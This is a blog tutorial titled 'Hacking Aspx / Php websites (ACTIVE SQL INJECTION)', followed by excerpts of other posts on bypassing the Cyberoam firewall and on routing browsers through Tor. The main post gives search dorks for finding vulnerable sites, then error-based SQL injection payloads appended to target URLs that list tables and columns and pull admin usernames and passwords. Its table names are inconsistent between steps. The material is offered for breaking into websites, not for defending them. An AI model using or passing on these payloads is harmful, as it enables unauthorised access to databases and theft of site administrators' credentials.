Skip to main content

Hacking Aspx / Php websites (ACTIVE SQL INJECTION)


Hacking Aspx / Php websites (ACTIVE SQL INJECTION)


hey guys in this tutorial i will show you how to make a injection on a aspx based website. 

1) seach aaspx website. 
for this step you can use one of this dorks 

".aspx?bookID= "    OR        ".php?id= "

2) If you found one lets check if the website is vulnverable. Add this text after the url 
"order by 1--" 
example : http://www.target.com/index.aspx?Id=1 order by 1-- 
Now you will get a Error : "Page not found" or something like that. 

3) Lets go on and begin with the Injection the first step of every injection is to find out the columns. 
for this step we use : 
"having 1=1" 
you only have to copy it behind the url 
example : http://www.target.com/index.aspx?Id=1 having 1=1 

4) Well lets go on and search the tables. Use this code for it 
and 1=convert 
example : http://www.target.com/index.aspx?Id=1 and 1=convert 
The output is the first table of the databse. But this table don't helps you . 
You need to find the admin table. 
Use this query to get the next table : 
"and 1=convert 
(int,(select top 1 table_name from information_schema.tables where 
table_name not in ('Tab_FinalOrder')))" 

example : http://www.target.com/index.aspx?Id=1 and 1=convert 
(int,(select top 1 table_name from information_schema.tables where 
table_name not in ('Tab_FinalOrder'))) 

Now we get the name of the admin table. The Admintable name is in this example "Administration" 

5) Now lets get into the table Administration 
use this query for it: 
and 1=convert 

"(int,(select top 1 column_name from information_schema. 
columns where table_name = 'AdminMaster'))" 

example : http://www.target.com/index.aspx?Id=1 and 1=convert 
(int,(select top 1 column_name from information_schema. 
columns where table_name = 'AdminMaster')) 

6) Our results are the tables "AdminName" and "AdminPassword" 
Now have dont the most part of this injection. The last step is to find out Adminname and Adminpassword. 

Query for Admin name : 
"and 1=convert(int,(select top 1 AdminName from Administration))" 
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminName from Administration)) 

Query for Admin pass : 
"and 1=convert(int,(select top 1 AdminPassword from Administration))" 
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminPassword from Administration)) 

7) So now your are nearly finish. You only need to find out the Admin Login Pannel.

Comments

Popular posts from this blog

Hacking Cyberoam(Bypassing)

Hacking Cyberoam(Bypassing) Module A : Find open ports and your organization IP Step 1 : Download Free Port Scanner Software The first software required to crack software is a free port scanner software. download from  http://hotfile.com/dl/13028395/0467e17/FreePortScanner.rar.html It is also available on  http://www.nsauditor.com/network_tools/free  port scanner software Step 2 : Install free port scanner. Step 3 : Detecting the static IP assigned to your organization. you need to find out the static IP assigned to your organization which is allocated by the ISP Goto  www.WhatIsMyIP.com Here the site will display your IP address. Please note down your IP address which we will be using again in the further steps. Step 4 : Scanning open ports for your external IP address. Entering IP address whose port has to be scanned.                        Note the active port :                       Module B: Configuring proxy server Step 1 : Download Proxifier – proxy software To hack cyberoa

How to configure tor network in all browser

1. Download Vidalia Bridge Bundle https://www.torproject.org/download/download.html.en 2. click on start tor on Vidalia control panel 3.Wait till it connect to proxy servers 4.Go to Internet Explorer  5.Go to tools -> internet options 6.Click on Lan settings. 7.Click check on use proxy then click on advanced button 8.Proxy setting only socks ip of 127.0.0.1 and port 9050 9.Click ok and done